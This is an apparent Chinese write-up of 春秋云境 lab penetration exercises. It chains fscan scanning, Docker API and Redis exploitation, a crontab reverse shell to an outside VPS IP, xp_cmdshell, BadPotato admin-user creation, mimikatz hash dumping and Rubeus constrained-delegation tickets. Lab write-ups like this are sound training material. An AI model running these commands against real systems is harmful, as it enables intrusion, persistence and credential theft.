春秋云境...
Unauthorized 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 └> fscan -h 47.92 .91.146 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 47.92.91.146 is alive [*] Icmp alive hosts len is: 1 47.92.91.146:80 open 47.92.91.146:22 open 47.92.91.146:2375 open [*] alive ports len is: 3 start vulscan [*] WebTitle: http://47.92.91.146 code:200 len:27170 title:某某装饰 [*] WebTitle: http://47.92.91.146:2375 code:404 len:29 title:None [+] http://47.92.91.146:2375 poc-yaml-docker-api-unauthorized-rce [+] http://47.92.91.146:2375 poc-yaml-go-pprof-leak 已完成 3/3 [*] 扫描结束,耗时: 27.951911999s
2375端口 Docker API 未授权访问容器逃逸漏洞
1 2 3 4 5 6 7 8 ┌──(root㉿kali)-[~] └─ REPOSITORY TAG IMAGE ID CREATED SIZE php latest 7988 a23aed21 6 months ago 489 M mysql 5.7 34e82 e623818 7 months ago 429 MB ubuntu latest 27941809078 c 7 months ago 77.8 MB ubuntu 18.04 ad080923604a 7 months ago 63.1 MB alpine latest e66264b98777 8 months ago 5.53 MB
启动一个docker,挂载点设置为服务器的根目录挂载至/mnt目录下
1 docker -H tcp://47.92.91.146:2375 run -it -v /:/mnt ubuntu:18.04 /bin/bash
在云服务器上生成公钥私钥id_rsa(私钥)、id_rsa.pub(公钥),将公钥写入目标机器上
1 echo "ssh-rsa " >/mnt/root/.ssh/authorized_keys
1 2 scp -r /tmp/nps root@47.92 .91.146 :/tmp scp /tmp/fscan_amd64 root@47.92 .91.146 :/tmp
fscan扫描全网段
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 root@localhost:/tmp ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan 172.22.7.67:21 open 172.22.7.13:22 open 172.22.7.31:80 open 172.22.7.67:80 open 172.22.7.13:80 open 172.22.7.6:135 open 172.22.7.31:135 open 172.22.7.67:135 open 172.22.7.6:139 open 172.22.7.31:139 open 172.22.7.67:139 open 172.22.7.6:445 open 172.22.7.31:445 open 172.22.7.67:445 open 172.22.7.6:88 open 172.22.7.13:2375 open 172.22.7.67:8081 open [*] alive ports len is: 17 start vulscan 已完成 0/17 [-] Ms17010 172.22.7.31 read tcp 172.22.7.13:44620->172.22.7.31:445: read: connection reset by peer [*] NetBios: 172.22.7.31 XIAORANG\ADCS [*] NetBios: 172.22.7.67 XIAORANG\WIN-9BMCSG0S [*] NetInfo: [*]172.22.7.6 [->]DC02 [->]172.22.7.6 [*] NetInfo: [*]172.22.7.31 [->]ADCS [->]172.22.7.31 [*] NetBios: 172.22.7.6 [+]DC XIAORANG\DC02 [*] WebTitle: http://172.22.7.13:2375 code:404 len:29 title:None [*] WebTitle: http://172.22.7.13 code:200 len:27170 title:某某装饰 [*] NetInfo: [*]172.22.7.67 [->]WIN-9BMCSG0S [->]172.22.7.67 [+] ftp://172.22.7.67:21:anonymous [->]1-1P3201024310-L.zip [->]1-1P320102603C1.zip [->]1-1P320102609447.zip [->]1-1P320102615Q3.zip [->]1-1P320102621J7.zip [->]1-1P320102J30-L.zip [*] WebTitle: http://172.22.7.31 code:200 len:703 title:IIS Windows Server [+] http://172.22.7.31 poc-yaml-active-directory-certsrv-detect [*] WebTitle: http://172.22.7.67 code:200 len:703 title:IIS Windows Server [*] WebTitle: http://172.22.7.67:8081 code:200 len:4621 title:公司管理后台 [+] http://172.22.7.13:2375 poc-yaml-docker-api-unauthorized-rce [+] http://172.22.7.67:8081/www.zip poc-yaml-backup-file [+] http://172.22.7.13:2375 poc-yaml-go-pprof-leak 已完成 17/17
环境寄了下线
Brute4Road 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 └> fscan -h 47.92 .223.156 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 47.92.223.156 is alive [*] Icmp alive hosts len is: 1 47.92.223.156:80 open 47.92.223.156:21 open 47.92.223.156:22 open 47.92.223.156:6379 open [*] alive ports len is: 4 start vulscan [*] WebTitle: http://47.92.223.156 code:200 len:4833 title:Welcome to CentOS [+] Redis:47.92.223.156:6379 unauthorized file:/usr/local/redis/db/ [+] ftp://47.92.223.156:21:anonymous [->]pub 已完成 4/4
存在redis未授权,在vps上打一下主从复制rce
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 root@VM-8-9-ubuntu:/tmp/redis-rogue-server ______ _ _ ______ _____ | ___ \ | (_) | ___ \ / ___| | |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __ | // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ ' __| | |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ | \_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_| __/ | |___/ @copyright n0b0dy @ r3kapig [info] TARGET 47.92.240.132:6379 [info] SERVER 43.138.127.132:21000 [info] Setting master... [info] Setting dbfilename... [info] Loading module... [info] Temerory cleaning up... What do u want, [i]nteractive shell or [r]everse shell: i [info] Interact mode start, enter "exit" to quit. [<<] whoami [>>] redis
环境容易断,写个计划任务。
1 echo "* * * * * bash -i >& /dev/tcp/43.138.127.132/3333 0>&1" | crontab -
第一个flag需要提权,suid提权
1 2 find / -user root -perm -4000 -exec ls -ldb {} \; base64 "/home/redis/flag/flag01" | base64 --decode
netstat -ano 获取网段
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 ./fscan_linux -h 172.22.2.1/24 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.2 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172.22.2.3 is alive (icmp) Target 172.22.2.7 is alive (icmp) Target 172.22.2.34 is alive (icmp) Target 172.22.2.16 is alive (icmp) Target 172.22.2.18 is alive [*] Icmp alive hosts len is: 5 172.22.2.34:135 open 172.22.2.3:135 open 172.22.2.18:80 open 172.22.2.16:80 open 172.22.2.16:139 open 172.22.2.18:22 open 172.22.2.7:80 open 172.22.2.18:139 open 172.22.2.7:22 open 172.22.2.7:21 open 172.22.2.34:139 open 172.22.2.7:6379 open 172.22.2.16:1433 open 172.22.2.34:445 open 172.22.2.16:445 open 172.22.2.18:445 open 172.22.2.3:445 open 172.22.2.16:135 open 172.22.2.3:139 open 172.22.2.3:88 open [*] alive ports len is: 20 start vulscan [*] NetBios: 172.22.2.34 XIAORANG\CLIENT01 [*] NetInfo: [*]172.22.2.3 [->]DC [->]172.22.2.3 [*] NetInfo: [*]172.22.2.34 [->]CLIENT01 [->]172.22.2.34 [*] WebTitle: http://172.22.2.16 code:404 len:315 title:Not Found [*] WebTitle: http://172.22.2.7 code:200 len:4833 title:Welcome to CentOS [*] NetBios: 172.22.2.16 MSSQLSERVER.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] NetInfo: [*]172.22.2.16 [->]MSSQLSERVER [->]172.22.2.16 [*] NetBios: 172.22.2.18 WORKGROUP\UBUNTU-WEB02 [*] 172.22.2.16 (Windows Server 2016 Datacenter 14393) [+] Redis:172.22.2.7:6379 unauthorized file:/usr/local/redis/db/dump.rdb [*] 172.22.2.3 (Windows Server 2016 Datacenter 14393) [*] NetBios: 172.22.2.3 [+]DC DC.xiaorang.lab Windows Server 2016 Datacenter 14393 [+] ftp://172.22.2.7:21:anonymous [->]pub [*] WebTitle: http://172.22.2.18 code:200 len:57738 title:又一个WordPress站点
修改/etc/proxychains4.conf配置文件进行代理http://172.22.2.18/ https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
1 2 3 exec sp_configure 'show advanced options' , 1 ;reconfigure;exec sp_configure 'xp_cmdshell' ,1 ;reconfigure;exec master..xp_cmdshell "whoami"
1 C:/迅雷下载/BadPotatoNet4.exe "net user spoic a123456 /add"
加入管理组
1 C:/迅雷下载/BadPotatoNet4.exe "net localgroup administrators spoic /add"
连接远程桌面(有几次下发的环境rdp玄学连不上),然后上传mimikatz获取域用户hash
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 mimikatz Authentication Id : 0 ; 92700 (00000000 :00016 a1c) Session : Service from 0 User Name : MSSQLSERVER Domain : NT Service Logon Server : (null) Logon Time : 2023 /2 /10 10 :24 :05 SID : S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 msv : [00000003 ] Primary * Username : MSSQLSERVER$ * Domain : XIAORANG * NTLM : 06887 f7bfcebf1d3a321680662263b83 * SHA1 : 0 ebee4e9d5966a611735b43e929ceea90c7074d5 tspkg : wdigest : * Username : MSSQLSERVER$ * Domain : XIAORANG * Password : (null) kerberos : * Username : MSSQLSERVER$ * Domain : xiaorang.lab * Password : 2 e d6 ac 4 e 5 b b9 a7 d1 73 cd ec b9 c3 10 6 c 52 61 e6 15 96 f8 ac 91 60 fa 1 b 9 e 30 bd bb 4 d 03 0 f 32 49 73 7 f a1 88 da 6 f 01 14 81 25 45 7 d 83 89 ac df 9 b 63 cb f1 3 e 25 f5 6 a cf 02 92 e9 cc 77 e2 8 b 01 e3 f3 f5 c2 b0 ed 05 a0 19 91 0 a 35 71 75 1 b 47 39 26 22 71 66 6 c fe 58 df 2 e 44 68 14 fb f3 b6 dc 38 d5 d3 16 14 e9 20 5 c 7 c ad c0 dc fd 0 a f3 6 c 5 d af 6 d 5 f 0 a a4 d6 ca 05 e8 26 c2 60 32 65 ce ea 93 2 e ae 04 ab 01 78 e9 01 72 91 b7 99 b3 9 f 65 7 b 3 d 8 c 49 97 3 d 3 d ab 5 e 9 f a4 40 6 c 3 d 4 e 40 1 c 3 d 14 33 56 fb 06 55 49 60 ba 52 a7 67 d3 18 49 0 c 73 23 4 b ff 4 d c7 44 2 c b4 19 63 9 a d5 ca c8 8 d ff b8 5 b e2 fd b2 92 1 e 50 8 e 23 08 15 66 2 e 64 a2 92 77 e0 45 bc 93 27 d5 fe 15 49 9 f d0 f5 77 83 3 e e4 a0 98 ee 0 c fd ssp : credman :
MSSQLSERVER机器配置了到 DC LDAP 和 CIFS 服务的约束性委派,只有服务账户尝试委派攻击Rubeus.exe ,用Rubeus申请票据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 C:/迅雷下载>Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:06887 f7bfcebf1d3a321680662263b83 /domain:xiaorang.lab /dc:DC.xiaorang.lab /nowrap ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.2 [*] Action: Ask TGT [*] Using rc4_hmac hash: 06887f7bfcebf1d3a321680662263b83 [*] Building AS-REQ (w/ preauth) for : 'xiaorang.lab\MSSQLSERVER$' [*] Using domain controller: 172.22.2.3:88 [+] TGT request successful! [*] base64 (ticket.kirbi):doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE18irHOZ2CuhTVmeak0lkS9s89smuTneMc3ZxPEqkNIr2Q1k3FkrCqVV7jb2A3GjgM/PbsNhCLyqOKLxmU/4 CeWnX7w1PA7H8Im2R6veClboNxj3L0yiUYFpGxS0z4qGoDNUu5R +8 Ar3MaxQi3XomhgTkTe940gR1Kmy+5 B09WFte5qr1xFhRMrnI2UKFM3QS0DGe/oKqA5RZhSUPiiDXNzF5lClh6Gp7Fdz6/DU4XmPIzqNSMF7XicuchNbwUYhSwV4IKbgcspq2OkTFsn/wtIJP6M5Em5bpsAcyrp8KOqYO/74 ESgbHIDM51E+UW/+rRxvJyNv6H +IeKoFc+U/mlK+1 JLE7d5ERCfelO8h2kfQ2bEBW4+14 qxc11yYIojjoA94sfWu3ymbfgUUQLqwqYPbQtUZH9IcpgX/RN+OIVp9ZT0h0hfGCT5aWpvnaLPtoqwcPUEzfCXH8DSOIngSiUirw8vcrebJhGhsW9mrVehcYdqUzBjnrW7br9q1vuM9PkKLEExJfHlQJmEGrjPegYIgK5Ww9E7iHJ9riS8ieZVMvYO/kqD5QwRhQN4S2XO+dzP52c21efD6KtukfvG7Ih7Gg190rmSS1HQRQrA7a5z4XoH7C7J94BhLm5AzvYSPnHYTuogxxBz/oog+sKuFqz40p1k/Rn4Pe2tPzrBF2Uped8/qwSVV68uo16JZk9szgJxQX1KbNMcnVDdcMcPnmb1bgDEcWBuzZrUk/C8ThDmeMm5npCn4cxo9he0DCxGVYMQO/6 oumOLufbpbiPFeH25O2vwdJDpHUUs9x+9 X4/mj4mtzIK/W+Nh8rHm310oA3I7QPgEAft8lqYmv5eenKT4neK+mcTs2WCbGMtltzA7cvlPCFgAQ48uD2GSrTFnZ0Hn4l8PtXVMXMXhObFuke6QJXQ1NbEeQe5HZe0teCosJL7tPUv95NawV1Zx+jjVSJGikMLGXM5BW6PzOhnwmEWZMp2nnfUgzifiDCHLM/D6p3uiCL/bOP98YeYWRBWG75YFeLHBLQZeFKB56l030XeL1YsAIo3GKVQV80v2hNMnTo/bnhxkbkRBxVh37vTM9WQcCGhN6p4zy3K1ku0h +shS386rvk4R54hQrLBIkZxA274pY/zpQ94rVV97yqmBjp9ZJbOmS23KJ78kdts/n73RsOdvbDXwmvmCmc/RyzyGM25tHErrXqBXHeGquejZHfdn3HYLwp4P5L0kKkrydYhWJOz03CIscZ0+6 TGdSHTXe37Ccd8D05v667XO0wfOQx3yr682NYtvpVChVb0CDJXEiWdTe886+eQn2Tn/6 yBeET6nHtl+C6aktv1/6 VncKYihEWgqB7+bpMi4yjXm8qKGMSpCUvwPclrmVBc8wiEe1BogT3BKwApWmciM4xZLqR21aiv0tUnitn5XzzZP6OOUlkOne6qd7iEKQurP+Qcy6qY65sNswT3BwimibgajgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCQsPS+fKPujDcj7alUjGx3oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDIxMDA3MTExMlqmERgPMjAyMzAyMTAxNzExMTJapxEYDzIwMjMwMjE3MDcxMTEyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg== ServiceName : krbtgt/xiaorang.lab ServiceRealm : XIAORANG.LAB UserName : MSSQLSERVER$ UserRealm : XIAORANG.LAB StartTime : 2023 /2 /10 15 :11 :12 EndTime : 2023 /2 /11 1 :11 :12 RenewTill : 2023 /2 /17 15 :11 :12 Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : kLD0vnyj7ow3I+2 pVIxsdw== ASREP (key) : 06887 F7BFCEBF1D3A321680662263B83 C:/迅雷下载>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:LDAP/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE18irHOZ2CuhTVmeak0lkS9s89smuTneMc3ZxPEqkNIr2Q1k3FkrCqVV7jb2A3GjgM/PbsNhCLyqOKLxmU/4 CeWnX7w1PA7H8Im2R6veClboNxj3L0yiUYFpGxS0z4qGoDNUu5R +8 Ar3MaxQi3XomhgTkTe940gR1Kmy+5 B09WFte5qr1xFhRMrnI2UKFM3QS0DGe/oKqA5RZhSUPiiDXNzF5lClh6Gp7Fdz6/DU4XmPIzqNSMF7XicuchNbwUYhSwV4IKbgcspq2OkTFsn/wtIJP6M5Em5bpsAcyrp8KOqYO/74 ESgbHIDM51E+UW/+rRxvJyNv6H +IeKoFc+U/mlK+1 JLE7d5ERCfelO8h2kfQ2bEBW4+14 qxc11yYIojjoA94sfWu3ymbfgUUQLqwqYPbQtUZH9IcpgX/RN+OIVp9ZT0h0hfGCT5aWpvnaLPtoqwcPUEzfCXH8DSOIngSiUirw8vcrebJhGhsW9mrVehcYdqUzBjnrW7br9q1vuM9PkKLEExJfHlQJmEGrjPegYIgK5Ww9E7iHJ9riS8ieZVMvYO/kqD5QwRhQN4S2XO+dzP52c21efD6KtukfvG7Ih7Gg190rmSS1HQRQrA7a5z4XoH7C7J94BhLm5AzvYSPnHYTuogxxBz/oog+sKuFqz40p1k/Rn4Pe2tPzrBF2Uped8/qwSVV68uo16JZk9szgJxQX1KbNMcnVDdcMcPnmb1bgDEcWBuzZrUk/C8ThDmeMm5npCn4cxo9he0DCxGVYMQO/6 oumOLufbpbiPFeH25O2vwdJDpHUUs9x+9 X4/mj4mtzIK/W+Nh8rHm310oA3I7QPgEAft8lqYmv5eenKT4neK+mcTs2WCbGMtltzA7cvlPCFgAQ48uD2GSrTFnZ0Hn4l8PtXVMXMXhObFuke6QJXQ1NbEeQe5HZe0teCosJL7tPUv95NawV1Zx+jjVSJGikMLGXM5BW6PzOhnwmEWZMp2nnfUgzifiDCHLM/D6p3uiCL/bOP98YeYWRBWG75YFeLHBLQZeFKB56l030XeL1YsAIo3GKVQV80v2hNMnTo/bnhxkbkRBxVh37vTM9WQcCGhN6p4zy3K1ku0h +shS386rvk4R54hQrLBIkZxA274pY/zpQ94rVV97yqmBjp9ZJbOmS23KJ78kdts/n73RsOdvbDXwmvmCmc/RyzyGM25tHErrXqBXHeGquejZHfdn3HYLwp4P5L0kKkrydYhWJOz03CIscZ0+6 TGdSHTXe37Ccd8D05v667XO0wfOQx3yr682NYtvpVChVb0CDJXEiWdTe886+eQn2Tn/6 yBeET6nHtl+C6aktv1/6 VncKYihEWgqB7+bpMi4yjXm8qKGMSpCUvwPclrmVBc8wiEe1BogT3BKwApWmciM4xZLqR21aiv0tUnitn5XzzZP6OOUlkOne6qd7iEKQurP+Qcy6qY65sNswT3BwimibgajgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBCQsPS+fKPujDcj7alUjGx3oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMDIxMDA3MTExMlqmERgPMjAyMzAyMTAxNzExMTJapxEYDzIwMjMwMjE3MDcxMTEyWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg= ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.2 [*] Action: S4U [*] Action: S4U [*] Building S4U2self request for : 'MSSQLSERVER$@XIAORANG.LAB' [*] Using domain controller: DC.xiaorang.lab (172.22.2.3) [*] Sending S4U2self request to 172.22 .2.3 :88 [+] S4U2self success! [*] Got a TGS for 'Administrator' to 'MSSQLSERVER$@XIAORANG.LAB' [*] base64 (ticket.kirbi): doIF3DCCBdigAwIBBaEDAgEWooIE5DCCBOBhggTcMIIE2KADAgEFoQ4bDFhJQU9SQU5HLkxBQqIZMBeg AwIBAaEQMA4bDE1TU1FMU0VSVkVSJKOCBKQwggSgoAMCARKhAwIBAqKCBJIEggSO2iTM3BQuKgoWRa+l sROvn0vz/idFEortSxr61NXftlJcelJFht3nBXU2xcp3BhsAq4jrmjGYZxZSaTqyNElq81MxLJy6yTiT biH1pG+QNIeciP63puynjeLVhGJHHxkqIIX0io8qCh9AU9Ychvy+ur3Dm2QbAM+loVBHJm0p+GZyLB++ cfs9GJE9dILtOmsu4CJ+C261SR2lAC+idnFmQPI2CVuuURVJ+CqGcNswl5+cosOOfint5ekN6pIpRWzO mistZ/ORO8smCXgUsX8HdYws/4 ILRhZ6UmL/AMbI5lCnlcQgdhclCZ1JDw2TX5GadDzern/MX+7 Wmh2l A5Fw5QEiIDNVvQDBP8m699x8Mo7HiGd7RCP+Mlvoht+XgAc0oR6+E7Nz4M+wRB8yHnI3Bnxxmw5aUqnv vDYNoq7vwsKW9aZFMpZy4/V4WvIdzUJ2BRZlQzPJTPZ3KtYYelQYWHNanZ0FVJfV9L9D2Bc9J1bFCBX8 LxIyPeBPc6evrDrItoojUthtC2LCBof//U9jjgg3XLyD6Gr91s7COheMi78Bzipi31EWaPkvBUnxVB3K O0cwG6e0OvxQsVdQxq2j2xp5nB5u8MaWnmK+j4MecyvKDsR+zZU45pvbQbVrgpBJwtB/wSCTXAFfSMJf ficqtpOXDXiG/uAL06xsEn5ZAlE0Ctc3jPr4ZMmAZfAXnjrp6KKaJSlX7mnO/Ne0w6mzaLIqtp538sIP zWOkR459x05l4C+6 yStZ4r4/3 vPcbBqih88iU6/m4TVIuCefCeBQPrHIIMgfsGa9Iwnq6Ednd9Xsbax+ bUCCw8U2zRaoxpFiy5dn0Dj468+5 Jb8wWwSr/ljjbxuuoNcnWtNYZ0dBa4dJsuL3GJLSZUp9AwitQJ+C w/bVYmkw+jnxo7Jg+2 sX8CNEbdLDBML1BO04DS2n0Tx0U+tuWF6lWwa6MuVYDXtGYjBvoo+APWtxyh8S d89U82Ib55LjD57xb0dsNBCAziGoKepmqo/7 u+BsmeZVpzbt2wI+E9Tf6ceYL/9 V6TORCtPqMyktgrlJ ErCYr+Wl0hpHSwBbn9ffgsJqO/2 dkn9/rDxOxQj1G6IZIynQcZU2b0E9QzdjknTodli89+3 Fwg3KxaaQ q+rBWteB4VZxHoUlNSnzJHFonK/snR5rwMbzRiu8LDPH6eYLhflSsk5UpCJQK0JDOBLY2B2jJFci8uD8 lSGuyVN21UJT/Oc24xlqep1Ql7gX/RsFj4qC1kHbh+dnfuOPwMIDZ80qchPyAn1EAUmADsyv0zrTbHWR TMzuu92BFNtO0aC /5 RUFvxHuA1FuBWkdYGPcD/PUIYqgZLy+WIe1UB0BPXyhdYCjQlmSGac7F/YKI7EI 0 MAHeG8hJ3yJVJmXjMnYedFQc+3 eAyWlzM8pe/bFcEIYaTTpkMHb0HQNJzplHUHBQ3s9gy+DNTgXKnhP h4psRSbPenX7toFLxCyyJk/Rie6t9z1GTKLgXXAG5ReYvWl/QTitXAjbLLm4hXkEHg2CjjfwbzFjli63 lTlL8R7POWkPQ09wHgSjgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCAc Rc2UFBzLIWBaJVN1kJIzGQ6vMVo6Y1CP2nNPeKuAg6EOGwxYSUFPUkFORy5MQUKiGjAYoAMCAQqhETAP Gw1BZG1pbmlzdHJhdG9yowcDBQBAoQAApREYDzIwMjMwMjEwMDgwOTQxWqYRGA8yMDIzMDIxMDE3MTEx MlqnERgPMjAyMzAyMTcwNzExMTJaqA4bDFhJQU9SQU5HLkxBQqkZMBegAwIBAaEQMA4bDE1TU1FMU0VS VkVSJA== [*] Impersonating user 'Administrator' to target SPN 'LDAP/DC.xiaorang.lab' [*] Building S4U2proxy request for service: 'LDAP/DC.xiaorang.lab' [*] Using domain controller: DC.xiaorang.lab (172.22.2.3) [*] Sending S4U2proxy request to domain controller 172.22 .2.3 :88 [+] S4U2proxy success! [*] base64 (ticket.kirbi) for SPN 'LDAP/DC.xiaorang.lab' : doIGhjCCBoKgAwIBBaEDAgEWooIFlTCCBZFhggWNMIIFiaADAgEFoQ4bDFhJQU9SQU5HLkxBQqIiMCCg AwIBAqEZMBcbBExEQVAbD0RDLnhpYW9yYW5nLmxhYqOCBUwwggVIoAMCARKhAwIBBKKCBToEggU2tfb4 B9wppun2bobrjzF68HcmnLTqVGUOtHg/f1+70 hzakfWIACTlXvo1crCRDiusarhC3Xr002uJf4XMLDIE X4bLeiiQqwRVnUdCdiEmmZSnlR6OnEu8bnY7Fl1qa5WVUlFZvoRwKGh90m5n/mDBpQf/hbL9U4+3 be5I 5 YriCAmBak4yMsDmIEO+lqq66mXUpo1o8YCz9U4ZHF5huynM9KIjjJeW6Lk9yoepGuZhsmiReTuvGt79 kEGCNrOvCOvJzWACWaaAkgICutePpSE0Crjl5c345sVw/zlLomBwcw2YZ4+jxO5JHzOX4L/DDEAvShQX ZkAgJ2LMObQavB+nN7M3U1YqxjSYHedJju/DahsPGFM9XuSRvd0h8aBr3Joqg676G7Cf+SrTJvS0CCAJ gwyPA7+dck/eiqSaC0WaTXlSFW00gQgPPZOygI+Lp07MQacCD6PEHqocXszge4ID9PKeZoJTCHgJaYzq aMNqqEPe7E0FhkGC2J5+9 pRHKFdsA2wEI4JU7UzWrALkQd/Y7wxdcARMMT7RhKwQLkR/nEEW2/p++TyW Ksm43sNCo/+Ygk4WLPgOwqzl7MVFYS4pcXrzbQL4HGG/d/gqRWHalRI7ZGvQdWE/oiulUuVYTgdXOtks ggHuGow5GBWhQrIy06iW2zuo1p8OK/I1JVfrx8E4rfSp7du4mD4hOPIQR/FqW9S1NHYqGum92mNSFWAi 6 jynyH5Kf5kv6KuR3cVwtNhWD67T5ECWBEW1FsN827Vlyb3D7u9WAbhoPJha7s1iH2tgOkVLewyilVpe 9 Fm0cz22kJRqv9m5oADO6D9hfnItvHKiOTthtQb7BKM7Kc8mFx2R0GzJ1m/+LswVsFn5HlUCa2FxyMkM xi8xSKtvOWaYheJYw7shHxXRSJ3n6Ethj4OGTixejE6ylWIe47Lur2/iSRFsZvJQOW8pgaqI5eVcMJp4 dJmPaKxT4FTalKwi1LISd0PVDF0pMQIdWjnEaXBShe86zpWrvAlD27hi1S+6 tDnhHTVeQUWRT0RMdreU XQTq9kKUUa6f6i2lL+jwXG2GJkdd7GvqpKQH0mRRdabzshuqmnQAApV9jMZ8ahDEBKo2DpnvWHFXeDBh B4XESEYpKCMrF+udofcJ1pl3N3w1q+tkLYnDV6n0YlcppcsU4rNxPFGxjFP2a4KwTm4OGllwMZaKpqsh uY0xiOfW2QhDqSxDdmu+x1MdCrbMuMvY3a7JKlG1dbMk5uYAH8b7jjSVvE5vDxlhrNhn8w9IiMG/QSNu ZoAmo5AiaCKsPF4TQA9FJf6QQRqynMR060Eg6O+P2AlmJo5F/2 yBoPvqAePfVCMICuuO4uIe/FQIlkmy g7ad6e/q8gyHK4L6KWEWXb34ASpBxxdaRTMhZ5PUgmzcWc9Dp/24 oQ87w2Fza+RtmqGzklmBD091G0Zf +GEap8JCzVIE18c5SgiSj/JFwP7uHNiGrDZ1rT81bfRBi/YB6gWYKyNlR5ptKIG+heuLUYXcXGjie7R1 2 dEgovKsohck7dHgmajkzhI/eLSCHBqjnZco57L91gtL3mWN1dhDXb/rW/NinPyBPfHFc0Kelx3Ou2Rq tqbsP+zy/+eS9U+1 ujfePGIzhxJrreQ/pMxNUDGRQl3muECvFCcaX0t1GCXxkHH87qGfzXZh0Ir6szCW JgBgr9O2WAZR02i32Xv3DQaWba6RpzPYxuZRv9UgWA+jKPZhZMRQpmfj2/JAdNwJ7TQGRLdyYy8bfRoL uWmB/T/hAdX85ZmjgdwwgdmgAwIBAKKB0QSBzn2ByzCByKCBxTCBwjCBv6AbMBmgAwIBEaESBBBLW46K eYwWp4201JLGZYIMoQ4bDFhJQU9SQU5HLkxBQqIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0b3KjBwMF AEClAAClERgPMjAyMzAyMTAwODA5NDFaphEYDzIwMjMwMjEwMTcxMTEyWqcRGA8yMDIzMDIxNzA3MTEx MlqoDhsMWElBT1JBTkcuTEFCqSIwIKADAgECoRkwFxsETERBUBsPREMueGlhb3JhbmcubGFi [+] Ticket successfully imported!
注入后,LDAP 服务具有DCSync权限,导出域内用户的Hash
